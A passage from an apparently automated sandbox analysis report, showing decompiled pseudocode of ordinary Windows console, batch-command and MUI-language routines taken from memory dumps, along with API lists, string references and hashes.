                                                      									SetConsoleMode(_v2084, _t78);
                                                      								}
                                                      								_t60 = GetStdHandle(0xfffffff6);
                                                      								_t96 =  &_v2076;
                                                      								_v2080 = _t60;
                                                      								_t61 = GetConsoleMode(_t60,  &_v2076);
                                                      								__eflags = _t61;
                                                      								if(_t61 != 0) {
                                                      									_t75 = _v2076 | 0x00000007;
                                                      									__eflags = _t75;
                                                      									_v2057 = 1;
                                                      									SetConsoleMode(_v2080, _t75);
                                                      								}
                                                      								E4A7399E1(_t96, 0x2371, 1, _v2064);
                                                      								_v2056 = 0;
                                                      								_push( &_v2068);
                                                      								_push(0x3ff);
                                                      								_t67 = E4A7367D3(GetStdHandle(0xfffffff6),  &_v2056);
                                                      								__eflags = _t67;
                                                      								if(_t67 == 0) {
                                                      									L28:
                                                      									_t31 =  &_v2068;
                                                      									 *_t31 = _v2068 & 0x00000000;
                                                      									__eflags =  *_t31;
                                                      								} else {
                                                      									_t98 = _v2068;
                                                      									__eflags = _t98;
                                                      									if(__eflags == 0) {
                                                      										goto L28;
                                                      									}
                                                      									if(__eflags <= 0) {
                                                      										L29:
                                                      										__eflags = _v2058;
                                                      										if(_v2058 != 0) {
                                                      											SetConsoleMode(_v2084, _v2088);
                                                      										}
                                                      										__eflags = _v2057;
                                                      										if(_v2057 != 0) {
                                                      											SetConsoleMode(_v2080, _v2076);
                                                      										}
                                                      										_t68 = _v2068;
                                                      										__eflags = _t68;
                                                      										if(_t68 == 0) {
                                                      											goto L9;
                                                      										} else {
                                                      											 *((short*)(_t113 + _t68 * 2 - 0x804)) = 0;
                                                      											_t56 = E4A731730(_v2072,  &_v2056);
                                                      											goto L10;
                                                      										}
                                                      									}
                                                      									_t72 = _t113 + _t98 * 2 - 0x806;
                                                      									while(1) {
                                                      										__eflags =  *_t72 - 0x20;
                                                      										if( *_t72 >= 0x20) {
                                                      											goto L29;
                                                      										}
                                                      										_t98 = _t98 - 1;
                                                      										_t72 = _t72;
                                                      										_v2068 = _t98;
                                                      										__eflags = _t98;
                                                      										if(_t98 <= 0) {
                                                      											goto L29;
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L29;
                                                      							}
                                                      						} else {
                                                      							L8:
                                                      							_push(_t87);
                                                      							_push(0x232a);
                                                      							E4A736D44(_t90);
                                                      							L9:
                                                      							_t56 = 1;
                                                      							__eflags = 1;
                                                      							L10:
                                                      							_pop(_t107);
                                                      							_pop(_t110);
                                                      							L11:
                                                      							return E4A7313A9(_t56, _t87, _v8 ^ _t113, _t106, _t107, _t110);
                                                      						}
                                                      					}
                                                      					_push(0);
                                                      					_push(0x232a);
                                                      					E4A736D44(_t88);
                                                      				}
                                                      				_t56 = 1;
                                                      				goto L11;
                                                      			}

                                                      APIs
                                                      • wcsrchr.MSVCRT ref: 4A74CBB3
                                                      • wcschr.MSVCRT ref: 4A74CBC8
                                                      • wcsrchr.MSVCRT ref: 4A74CC1F
                                                      • GetStdHandle.KERNEL32(000000F5,-00000002), ref: 4A74CC40
                                                      • GetConsoleMode.KERNEL32 ref: 4A74CC56
                                                      • SetConsoleMode.KERNEL32 ref: 4A74CC79
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 4A74CC7D
                                                      • GetConsoleMode.KERNEL32 ref: 4A74CC8D
                                                      • SetConsoleMode.KERNEL32 ref: 4A74CCAA
                                                      • GetStdHandle.KERNEL32(000000F6,?,000003FF,?), ref: 4A74CCDF
                                                        • Part of subcall function 4A732D9B: iswspace.MSVCRT ref: 4A732DAD
                                                      • SetConsoleMode.KERNEL32 ref: 4A74CD2F
                                                      • SetConsoleMode.KERNEL32 ref: 4A74CD46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                      • String ID: sTtJ
                                                      • API String ID: 4166807220-3995157118
                                                      • Opcode ID: 8e42eab27b8da6d5ed8fba8d097483fa17002930f84d70a4a5ed615512e3e015
                                                      • Instruction ID: c89c119d576b8bc1ca81510251be1a4fcf2c2aec3c4244d9895d658b5e2b32fd
                                                      • Opcode Fuzzy Hash: 8e42eab27b8da6d5ed8fba8d097483fa17002930f84d70a4a5ed615512e3e015
                                                      • Instruction Fuzzy Hash: 3451B0729182289ADF709B64CC45B9A7FF8FF04350F11C5E9E189E6191DE708E89CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E02378788(signed int __ecx, void* __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				short* _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				void* _t216;
                                                      				intOrPtr _t231;
                                                      				short* _t235;
                                                      				intOrPtr _t257;
                                                      				short* _t261;
                                                      				intOrPtr _t284;
                                                      				intOrPtr _t288;
                                                      				void* _t314;
                                                      				signed int _t318;
                                                      				short* _t319;
                                                      				intOrPtr _t321;
                                                      				void* _t328;
                                                      				void* _t329;
                                                      				char* _t332;
                                                      				signed int _t333;
                                                      				signed int* _t334;
                                                      				void* _t335;
                                                      				void* _t338;
                                                      				void* _t339;
                                                      
                                                      				_t328 = __edx;
                                                      				_t322 = __ecx;
                                                      				_t318 = 0;
                                                      				_t334 = _a4;
                                                      				_v8 = 0;
                                                      				_v28 = 0;
                                                      				_v48 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v32 = 0;
                                                      				_v52 = 0;
                                                      				if(_t334 == 0) {
                                                      					_t329 = 0xc000000d;
                                                      					L49:
                                                      					_t334[0x11] = _v56;
                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                      					_t334[0x12] = _v60;
                                                      					_t334[0x13] = _v28;
                                                      					_t334[0x17] = _v20;
                                                      					_t334[0x16] = _v48;
                                                      					_t334[0x18] = _v40;
                                                      					_t334[0x14] = _v32;
                                                      					_t334[0x15] = _v52;
                                                      					return _t329;
                                                      				}
                                                      				_v56 = 0;
                                                      				if(E02378460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						_t207 = E0235E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      					}
                                                      					_push(1);
                                                      					_v8 = _t318;
                                                      					E0237718A(_t207);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				if(E02378460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_t333 =  *_v8;
                                                      					_v60 = _t333;
                                                      					_t314 = E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					_push(_t333);
                                                      					_v8 = _t318;
                                                      					E0237718A(_t314);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_t216 = E02378460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                      				_t332 = ";";
                                                      				if(_t216 < 0) {
                                                      					L17:
                                                      					if(E02378460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                      						L30:
                                                      						if(E02378460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                      							L46:
                                                      							_t329 = 0;
                                                      							L47:
                                                      							if(_v8 != _t318) {
                                                      								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      							}
                                                      							if(_v28 != _t318) {
                                                      								if(_v20 != _t318) {
                                                      									E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      									_v20 = _t318;
                                                      									_v40 = _t318;
                                                      								}
                                                      							}
                                                      							goto L49;
                                                      						}
                                                      						_t231 = _v24;
                                                      						_t322 = _t231 + 4;
                                                      						_push(_t231);
                                                      						_v52 = _t322;
                                                      						E0237718A(_t231);
                                                      						if(_t322 == _t318) {
                                                      							_v32 = _t318;
                                                      						} else {
                                                      							_v32 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      						}
                                                      						if(_v32 == _t318) {
                                                      							_v52 = _t318;
                                                      							L58:
                                                      							_t329 = 0xc0000017;
                                                      							goto L47;
                                                      						} else {
                                                      							E02352340(_v32, _v8, _v24);
                                                      							_v16 = _v32;
                                                      							_a4 = _t318;
                                                      							_t235 = E0236E679(_v32, _t332);
                                                      							while(1) {
                                                      								_t319 = _t235;
                                                      								if(_t319 == 0) {
                                                      									break;
                                                      								}
                                                      								 *_t319 = 0;
                                                      								_t321 = _t319 + 2;
                                                      								E0235E2A8(_t322,  &_v68, _v16);
                                                      								if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      								_v16 = _t321;
                                                      								_t235 = E0236E679(_t321, _t332);
                                                      								_pop(_t322);
                                                      							}
                                                      							_t236 = _v16;
                                                      							if( *_v16 != _t319) {
                                                      								E0235E2A8(_t322,  &_v68, _t236);
                                                      								if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      							}
                                                      							if(_a4 == 0) {
                                                      								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                      								_v52 = _v52 & 0x00000000;
                                                      								_v32 = _v32 & 0x00000000;
                                                      							}
                                                      							if(_v8 != 0) {
                                                      								E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      							}
                                                      							_v8 = _v8 & 0x00000000;
                                                      							_t318 = 0;
                                                      							goto L46;
                                                      						}
                                                      					}
                                                      					_t257 = _v24;
                                                      					_t322 = _t257 + 4;
                                                      					_push(_t257);
                                                      					_v40 = _t322;
                                                      					E0237718A(_t257);
                                                      					_t338 = _t335 + 4;
                                                      					if(_t322 == _t318) {
                                                      						_v20 = _t318;
                                                      					} else {
                                                      						_v20 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      					}
                                                      					if(_v20 == _t318) {
                                                      						_v40 = _t318;
                                                      						goto L58;
                                                      					} else {
                                                      						E02352340(_v20, _v8, _v24);
                                                      						_v16 = _v20;
                                                      						_a4 = _t318;
                                                      						_t261 = E0236E679(_v20, _t332);
                                                      						_t335 = _t338 + 0x14;
                                                      						while(1) {
                                                      							_v12 = _t261;
                                                      							if(_t261 == _t318) {
                                                      								break;
                                                      							}
                                                      							_v12 = _v12 + 2;
                                                      							 *_v12 = 0;
                                                      							E0235E2A8(_v12,  &_v68, _v16);
                                                      							if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      							_v16 = _v12;
                                                      							_t261 = E0236E679(_v12, _t332);
                                                      							_pop(_t322);
                                                      						}
                                                      						_t269 = _v16;
                                                      						if( *_v16 != _t318) {
                                                      							E0235E2A8(_t322,  &_v68, _t269);
                                                      							if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      						}
                                                      						if(_a4 == _t318) {
                                                      							E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      							_v40 = _t318;
                                                      							_v20 = _t318;
                                                      						}
                                                      						if(_v8 != _t318) {
                                                      							E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      						}
                                                      						_v8 = _t318;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      				_t284 = _v24;
                                                      				_t322 = _t284 + 4;
                                                      				_push(_t284);
                                                      				_v48 = _t322;
                                                      				E0237718A(_t284);
                                                      				_t339 = _t335 + 4;
                                                      				if(_t322 == _t318) {
                                                      					_v28 = _t318;
                                                      				} else {
                                                      					_v28 = E0235E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      				}
                                                      				if(_v28 == _t318) {
                                                      					_v48 = _t318;
                                                      					goto L58;
                                                      				} else {
                                                      					E02352340(_v28, _v8, _v24);
                                                      					_v16 = _v28;
                                                      					_a4 = _t318;
                                                      					_t288 = E0236E679(_v28, _t332);
                                                      					_t335 = _t339 + 0x14;
                                                      					while(1) {
                                                      						_v12 = _t288;
                                                      						if(_t288 == _t318) {
                                                      							break;
                                                      						}
                                                      						_v12 = _v12 + 2;
                                                      						 *_v12 = 0;
                                                      						E0235E2A8(_v12,  &_v68, _v16);
                                                      						if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      						_v16 = _v12;
                                                      						_t288 = E0236E679(_v12, _t332);
                                                      						_pop(_t322);
                                                      					}
                                                      					_t296 = _v16;
                                                      					if( *_v16 != _t318) {
                                                      						E0235E2A8(_t322,  &_v68, _t296);
                                                      						if(E02375553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      					}
                                                      					if(_a4 == _t318) {
                                                      						E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                      						_v48 = _t318;
                                                      						_v28 = _t318;
                                                      					}
                                                      					if(_v8 != _t318) {
                                                      						E0235E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					}
                                                      					_v8 = _t318;
                                                      					goto L17;
                                                      				}
                                                      			}





































                                                      0x02378788
                                                      0x02378788
                                                      0x02378791
                                                      0x02378794
                                                      0x02378798
                                                      0x0237879b
                                                      0x0237879e
                                                      0x023787a1
                                                      0x023787a4
                                                      0x023787a7
                                                      0x023787aa
                                                      0x023787af
                                                      0x023c1ad3
                                                      0x02378b0a
                                                      0x02378b0d
                                                      0x02378b13
                                                      0x02378b19
                                                      0x02378b1f
                                                      0x02378b25
                                                      0x02378b2b
                                                      0x02378b31
                                                      0x02378b37
                                                      0x02378b3d
                                                      0x02378b46
                                                      0x02378b46
                                                      0x023787c6
                                                      0x023787d0
                                                      0x023c1ae0
                                                      0x023c1ae6
                                                      0x023c1af8
                                                      0x023c1af8
                                                      0x023c1afd
                                                      0x023c1afe
                                                      0x023c1b01
                                                      0x023c1b06
                                                      0x023c1b06
                                                      0x023787d6
                                                      0x023787f2
                                                      0x023787f7
                                                      0x02378807
                                                      0x0237880a
                                                      0x0237880f
                                                      0x02378810
                                                      0x02378813
                                                      0x02378818
                                                      0x02378818
                                                      0x0237882c
                                                      0x02378831
                                                      0x02378838
                                                      0x02378908
                                                      0x02378920
                                                      0x023789f0
                                                      0x02378a08
                                                      0x02378af6
                                                      0x02378af6
                                                      0x02378af8
                                                      0x02378afb
                                                      0x023c1beb
                                                      0x023c1beb
                                                      0x02378b04
                                                      0x023c1bf8
                                                      0x023c1c0e
                                                      0x023c1c13
                                                      0x023c1c16
                                                      0x023c1c16
                                                      0x023c1bf8
                                                      0x00000000
                                                      0x02378b04
                                                      0x02378a0e
                                                      0x02378a11
                                                      0x02378a14
                                                      0x02378a15
                                                      0x02378a18
                                                      0x02378a22
                                                      0x02378b59
                                                      0x02378a28
                                                      0x02378a3c
                                                      0x02378a3c
                                                      0x02378a42
                                                      0x023c1bb0
                                                      0x023c1b11
                                                      0x023c1b11
                                                      0x00000000
                                                      0x02378a48
                                                      0x02378a51
                                                      0x02378a5b
                                                      0x02378a5e
                                                      0x02378a61
                                                      0x02378a69
                                                      0x02378a69
                                                      0x02378a6d
                                                      0x00000000
                                                      0x00000000
                                                      0x02378a74
                                                      0x02378a7c
                                                      0x02378a7d
                                                      0x02378a91
                                                      0x02378a93
                                                      0x02378a93
                                                      0x02378a98
                                                      0x02378a9b
                                                      0x02378aa1
                                                      0x02378aa1
                                                      0x02378aa4
                                                      0x02378aaa
                                                      0x02378ab1
                                                      0x02378ac5
                                                      0x02378ac7
                                                      0x02378ac7
                                                      0x02378ac5
                                                      0x02378ace
                                                      0x023c1bc9
                                                      0x023c1bce
                                                      0x023c1bd2
                                                      0x023c1bd2
                                                      0x02378ad8
                                                      0x02378aeb
                                                      0x02378aeb
                                                      0x02378af0
                                                      0x02378af4
                                                      0x00000000
                                                      0x02378af4
                                                      0x02378a42
                                                      0x02378926
                                                      0x02378929
                                                      0x0237892c
                                                      0x0237892d
                                                      0x02378930
                                                      0x02378935
                                                      0x0237893a
                                                      0x02378b51
                                                      0x02378940
                                                      0x02378954
                                                      0x02378954
                                                      0x0237895a
                                                      0x023c1b63
                                                      0x00000000
                                                      0x02378960
                                                      0x02378969
                                                      0x02378973
                                                      0x02378976
                                                      0x02378979
                                                      0x0237897e
                                                      0x02378981
                                                      0x02378981
                                                      0x02378986
                                                      0x00000000
                                                      0x00000000
                                                      0x023c1b6e
                                                      0x023c1b74
                                                      0x023c1b7b
                                                      0x023c1b8f
                                                      0x023c1b91
                                                      0x023c1b91
                                                      0x023c1b99
                                                      0x023c1b9c
                                                      0x023c1ba2
                                                      0x023c1ba2
                                                      0x0237898c
                                                      0x02378992
                                                      0x02378999
                                                      0x023789ad
                                                      0x023c1ba8
                                                      0x023c1ba8
                                                      0x023789ad
                                                      0x023789b6
                                                      0x023789c8
                                                      0x023789cd
                                                      0x023789d0
                                                      0x023789d0
                                                      0x023789d6
                                                      0x023789e8
                                                      0x023789e8
                                                      0x023789ed
                                                      0x00000000
                                                      0x023789ed
                                                      0x0237895a
                                                      0x0237883e
                                                      0x02378841
                                                      0x02378844
                                                      0x02378845
                                                      0x02378848
                                                      0x0237884d
                                                      0x02378852
                                                      0x02378b49
                                                      0x02378858
                                                      0x0237886c
                                                      0x0237886c
                                                      0x02378872
                                                      0x023c1b0e
                                                      0x00000000
                                                      0x02378878
                                                      0x02378881
                                                      0x0237888b
                                                      0x0237888e
                                                      0x02378891
                                                      0x02378896
                                                      0x02378899
                                                      0x02378899
                                                      0x0237889e
                                                      0x00000000
                                                      0x00000000
                                                      0x023c1b21
                                                      0x023c1b27
                                                      0x023c1b2e
                                                      0x023c1b42
                                                      0x023c1b44
                                                      0x023c1b44
                                                      0x023c1b4c
                                                      0x023c1b4f
                                                      0x023c1b55
                                                      0x023c1b55
                                                      0x023788a4
                                                      0x023788aa
                                                      0x023788b1
                                                      0x023788c5
                                                      0x023c1b5b
                                                      0x023c1b5b
                                                      0x023788c5
                                                      0x023788ce
                                                      0x023788e0
                                                      0x023788e5
                                                      0x023788e8
                                                      0x023788e8
                                                      0x023788ee
                                                      0x02378900
                                                      0x02378900
                                                      0x02378905
                                                      0x00000000
                                                      0x02378905

                                                      APIs
                                                      Strings
                                                      • Kernel-MUI-Language-Allowed, xrefs: 02378827
                                                      • Kernel-MUI-Language-SKU, xrefs: 023789FC
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 02378914
                                                      • Kernel-MUI-Number-Allowed, xrefs: 023787E6
                                                      • WindowsExcludedProcs, xrefs: 023787C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.685565082.0000000002340000.00000040.00000001.sdmp, Offset: 02330000, based on PE: true
                                                      • Associated: 00000007.00000002.685502431.0000000002330000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685850131.0000000002420000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685861725.0000000002430000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685875850.0000000002434000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685886803.0000000002437000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.685914274.0000000002440000.00000040.00000001.sdmp
                                                      • Associated: 00000007.00000002.686000770.00000000024A0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: cb1d53debc9d4a7cdd9251f45a82b1492e80f6ab2781caf9a10dd1921eb9cc98
                                                      • Instruction ID: a149c8b9c9a2ef2daba462c80fff0906703471b233e7a7a87bff6b20397de496
                                                      • Opcode Fuzzy Hash: cb1d53debc9d4a7cdd9251f45a82b1492e80f6ab2781caf9a10dd1921eb9cc98
                                                      • Instruction Fuzzy Hash: 46F1E5B2D00219EFCF61EF99C984DEEB7B9BF08304F14446AE905A7611E7349A45EF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E4A73D1D3(intOrPtr __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				intOrPtr _t69;
                                                      				signed int _t74;
                                                      				signed int _t81;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t86;
                                                      				intOrPtr _t89;
                                                      				intOrPtr _t92;
                                                      				intOrPtr* _t98;
                                                      				signed char _t110;
                                                      				signed int _t112;
                                                      				intOrPtr _t114;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t116;
                                                      				intOrPtr _t117;
                                                      				signed int _t119;
                                                      				intOrPtr _t121;
                                                      				intOrPtr _t122;
                                                      				char* _t123;
                                                      				intOrPtr _t124;
                                                      				intOrPtr* _t125;
                                                      
                                                      				_t118 = __ecx;
                                                      				_t125 = _a4;
                                                      				_t69 =  *_t125;
                                                      				if(_t69 > 0x37) {
                                                      					__eflags = _t69 - 0x38;
                                                      					if(__eflags == 0) {
                                                      						E4A73D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
                                                      						_push(_a12);
                                                      						L82:
                                                      						_push(_a8);
                                                      						_push( *(_t125 + 0x3c));
                                                      						L8:
                                                      						E4A73D1D3(_t118);
                                                      						L7:
                                                      						return 0;
                                                      					}
                                                      					if(__eflags <= 0) {
                                                      						L14:
                                                      						__imp__longjmp(0x4a754ac0, 0xffffffff);
                                                      						L15:
                                                      						_t121 = _a12;
                                                      						_t114 = _a8;
                                                      						E4A73D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x38)), 1);
                                                      						_t74 =  *(_t125 + 0x3c);
                                                      						__eflags =  *_t74 - 0x38;
                                                      						if( *_t74 == 0x38) {
                                                      							_t74 =  *(_t74 + 0x3c);
                                                      						}
                                                      						__eflags =  *((intOrPtr*)(_t74 + 0x40)) - 2;
                                                      						if( *((intOrPtr*)(_t74 + 0x40)) == 2) {
                                                      							E4A73D23C(_t114, _t121, E4A736098, 1);
                                                      						}
                                                      						E4A73D1D3(_t118,  *(_t125 + 0x3c), _t114, _t121);
                                                      						E4A73D1D3(_t118,  *((intOrPtr*)(_t125 + 0x40)), _t114, _t121);
                                                      						__eflags =  *(_t125 + 0x48);
                                                      						if( *(_t125 + 0x48) == 0) {
                                                      							goto L7;
                                                      						} else {
                                                      							E4A73D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x44)), 1);
                                                      							_push(_t121);
                                                      							_push(_t114);
                                                      							_push( *(_t125 + 0x48));
                                                      							goto L8;
                                                      						}
                                                      					}
                                                      					__eflags = _t69 - 0x3a;
                                                      					if(_t69 <= 0x3a) {
                                                      						__eflags =  *0x4a754081;
                                                      						_a4 = 0x4a743da0;
                                                      						if( *0x4a754081 != 0) {
                                                      							_t84 =  *((intOrPtr*)(_t125 + 0x44));
                                                      							__eflags = _t84 - 1;
                                                      							if(_t84 != 1) {
                                                      								__eflags = _t84 - 2;
                                                      								if(_t84 != 2) {
                                                      									__eflags = _t84 - 3;
                                                      									if(_t84 != 3) {
                                                      										__eflags = _t84 - 4;
                                                      										if(_t84 != 4) {
                                                      											__eflags = _t84 - 5;
                                                      											if(_t84 != 5) {
                                                      												__eflags = _t84 - 6;
                                                      												if(_t84 == 6) {
                                                      													_a4 = L"GEQ ";
                                                      												}
                                                      											} else {
                                                      												_a4 = L"GTR ";
                                                      											}
                                                      										} else {
                                                      											_a4 = L"LEQ ";
                                                      										}
                                                      									} else {
                                                      										_a4 = L"LSS ";
                                                      									}
                                                      								} else {
                                                      									_a4 = L"NEQ ";
                                                      								}
                                                      							} else {
                                                      								_a4 = L"EQU ";
                                                      							}
                                                      						}
                                                      						_t122 = _a12;
                                                      						_t115 = _a8;
                                                      						E4A73D23C(_t115, _t122,  *((intOrPtr*)(_t125 + 0x38)), 1);
                                                      						E4A73D23C(_t115, _t122, _a4, 0);
                                                      						_t81 =  *(_t125 + 0x3c);
                                                      						__eflags = _t81;
                                                      						if(_t81 != 0) {
                                                      							E4A73D23C(_t115, _t122, _t81, 0);
                                                      						}
                                                      						_push(_t122);
                                                      						_push(_t115);
                                                      						L6:
                                                      						_push(_t125);
                                                      						E4A73D0FE(_t118);
                                                      						goto L7;
                                                      					}
                                                      					__eflags = _t69 - 0x3b;
                                                      					if(_t69 == 0x3b) {
                                                      						L48:
                                                      						_t116 = _a12;
                                                      						E4A73D0FE(_t118, _t125, _a8, _t116);
                                                      						_t86 =  *_t125;
                                                      						__eflags = _t86 - 0x2e;
                                                      						if(_t86 < 0x2e) {
                                                      							L61:
                                                      							_t123 = _a4;
                                                      							L62:
                                                      							E4A73D1D3(_t118,  *((intOrPtr*)(_t125 + 0x38)), _a8, _t116);
                                                      							E4A73D23C(_a8, _t116, _t123, 1);
                                                      							_t89 =  *_t125;
                                                      							__eflags = _t89 - 0x33;
                                                      							if(_t89 == 0x33) {
                                                      								goto L7;
                                                      							}
                                                      							__eflags = _t89 - 0x3b;
                                                      							if(_t89 == 0x3b) {
                                                      								goto L7;
                                                      							}
                                                      							_push(_t116);
                                                      							goto L82;
                                                      						}
                                                      						__eflags = _t86 - 0x2f;
                                                      						if(_t86 <= 0x2f) {
                                                      							_t123 = E4A73272C;
                                                      							goto L62;
                                                      						}
                                                      						__eflags = _t86 - 0x30;
                                                      						if(_t86 == 0x30) {
                                                      							_t123 = E4A732A7C;
                                                      							goto L62;
                                                      						}
                                                      						__eflags = _t86 - 0x31;
                                                      						if(_t86 == 0x31) {
                                                      							_t123 = E4A732A58;
                                                      							goto L62;
                                                      						}
                                                      						__eflags = _t86 - 0x32;
                                                      						if(_t86 == 0x32) {
                                                      							_t123 = E4A732728;
                                                      							goto L62;
                                                      						}
                                                      						__eflags = _t86 - 0x33;
                                                      						if(_t86 == 0x33) {
                                                      							E4A73D23C(_a8, _t116, 0x4a74bd04, 1);
                                                      							_t123 = E4A732A84;
                                                      							goto L62;
                                                      						}
                                                      						__eflags = _t86 - 0x3b;
                                                      						if(_t86 != 0x3b) {
                                                      							goto L61;
                                                      						}
                                                      						E4A73D23C(_a8, _t116, 0x4a74bd08, 1);
                                                      						_t123 = E4A7325B8;
                                                      						goto L62;
                                                      					}
                                                      					__eflags = _t69 - 0x3c;
                                                      					if(_t69 != 0x3c) {
                                                      						goto L14;
                                                      					}
                                                      					_t92 =  *0x4a770918; // 0x0
                                                      					__eflags = _t92 - 0x2396;
                                                      					if(_t92 != 0x2396) {
                                                      						__eflags = _t92 - 0x2395;
                                                      						if(_t92 != 0x2395) {
                                                      							__eflags = _t92 - 0x2390;
                                                      							if(_t92 != 0x2390) {
                                                      								goto L14;
                                                      							}
                                                      							_push(1);
                                                      							_push(L"REM /?");
                                                      							L47:
                                                      							_push(_a12);
                                                      							_push(_a8);
                                                      							E4A73D23C();
                                                      							goto L7;
                                                      						}
                                                      						_push(1);
                                                      						_push(L"IF /?");
                                                      						goto L47;
                                                      					}
                                                      					_push(1);
                                                      					_push(L"FOR /?");
                                                      					goto L47;
                                                      				}
                                                      				if(_t69 >= 0x34 || _t69 == 0) {
                                                      					L3:
                                                      					E4A73D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
                                                      					_t95 =  *(_t125 + 0x3c);
                                                      					if( *(_t125 + 0x3c) != 0) {
                                                      						E4A73D23C(_a8, _a12, _t95, 0);
                                                      					}
                                                      					_push(_a12);
                                                      					_push(_a8);
                                                      					goto L6;
                                                      				} else {
                                                      					__eflags = _t69 - 0x2b;
                                                      					if(_t69 == 0x2b) {
                                                      						_t124 = _a12;
                                                      						_t117 = _a8;
                                                      						E4A73D23C(_t117, _t124, "FOR", 1);
                                                      						__eflags =  *0x4a754081;
                                                      						if( *0x4a754081 == 0) {
                                                      							L33:
                                                      							_t98 = 0x4a7545e8;
                                                      							do {
                                                      								_t119 =  *_t98;
                                                      								_t98 = _t98 + 2;
                                                      								__eflags = _t119;
                                                      							} while (_t119 != 0);
                                                      							_t118 =  *((intOrPtr*)(_t125 + 0x38));
                                                      							E4A73D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + (_t98 - 0x4a7545ea >> 1) * 2, 1);
                                                      							E4A73D23C(_t117, _t124, 0x4a74bd04, 1);
                                                      							E4A73D23C(_t117, _t124,  *(_t125 + 0x3c), 0);
                                                      							E4A73D23C(_t117, _t124, E4A732A84, 0);
